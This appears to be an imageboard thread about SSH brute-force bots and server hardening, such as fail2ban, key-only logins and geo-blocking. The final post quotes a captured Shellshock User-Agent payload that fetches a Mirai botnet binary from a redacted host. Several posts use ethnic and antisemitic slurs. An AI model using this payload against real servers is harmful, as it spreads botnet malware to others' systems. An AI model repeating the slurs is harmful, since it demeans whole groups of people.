Long live the FreeBSD handbook!

>not using tarpitting

Use fail2ban, ssh with keys and a firewall.

Just drop all Chinese packets

definitely this

and the ones from eastern europe or even any country besides your own. you have nothing to lose from doing that.

>Chinese bots
I'm just running a tor node. Problem solved.

t. angry chinaman

but we recommend that he blocks china

I'm a noob and this is unsettling to me.

>Luckily I disabled password authentication over SSH and only use pubkeys.
yeah, so lucky otherwise they definitely would have guessed it, am I rite?

protip: there are systems with password auth enabled sitting open to the internet everyday that have statistically insignificant levels of risk due to following proper password standards

stupid question but where are the ranges listed in a ready to use format?

wizcrafts.net/chinese-iptables-blocklist.html
Not sure how up to date this is anymore, I've had it book marked for ages.

Thanks. I'm lazy to look but I'm sure there are sources out there that have compiled ready to use lists for popular confs

this happens to every single server the second it starts. passphrase is absolutely necessary as soon as possible.

>Intel CPU
>browsing internet
>drive-by js steals ssh key
>ah-so me so solly

Too dumb to install fail2ban?

Is ssh on port 22 or something different?

I run some things from my home network and I get random ruskis and chinks slamming anything I have open every so often. Just happens, welcome to network administration

Well I just checked the log... I guess its time to install fail2ban

thats just automated bots trying default and leaked shit. even password login is enough as long as you use a good password. also someone who really cares would only whitelist their own ip or isp ip ranges if dynamic ip for ssh access in their firewall instead of letting everyone access it for no reason.

dumb me forgot pic

Just change the ssh port, that is all the security you need.

disable root login. create user in the sudoers group. simple as that. fail2ban is bloat.

Why not simply ban all of China and Russia ip ranges?

people.netfilter.org/peejix/geoip/howto/geoip-HOWTO-3.html

This. Had a server with ssh port 22 open to the public, I had between 20-30 IPs blocked each day for authentication failed on ssh p22 password. The password was a 40 char long P/W which was very easy to remember and had access anywhere. Nothing broke in, only attempts

because its easier to just whitelist your own ip addresses

What if I'm abroad and nginx crashes?

VPN

first of all you should not even have passwords for ssh, you should permit authorized rsa keys only, and definitely not allow root login

>he doesn't block china, india, and the entire middle east on his firewall
What are you even doing?

>Want to host VPN to access home storage everywhere.
>Scared of hacking attempts.
What do?

Why did we even give internet to subhumans? I don't get it. Now they want to give internet to Africa for free.

this is a better thread than ">THE ABSOLUTE STATE OF INTEL"

Use pfSense. It has nice autoconfig wizards for generating a secure OpenVPN config, and pfSense itself will prevent your VPN from being brute forced.

Deny all, then whitelist by country.

Yeah, let's go back to talking about how Linus Tech Tips invented the GNU/Interjection free operating system that stops Jewtel CPUs from mining your AMD bitcoins while you realize that Bill Jobs is /ourguy/ even though he makes the Chrome botnet that George Soros fights with the Quantum web extensions.

This is one of my favorite internet pastimes. I welcome it because it's free exploits and malware to analyze. And some people think shellshock still works like this guy

u'user-agent': u"() { :; }; /bin/sh -c 'wget redacted/wp-admin?infect-cctv=mirai-botnet.bin -O /dev/null;wget1 redacted/wp-admin
?infect-cctv=mirai-botnet.bin -O /dev/null;curl redacted/wp-admin?infect-cctv=mirai-botnet.bin -o /dev/null;/usr/sfwbin/wget redacted/wp-admin
?infect-cctv=mirai-botnet.bin;fetch -/dev/null redacted/wp-admin?infect-cctv=mirai-botnet.bin'"}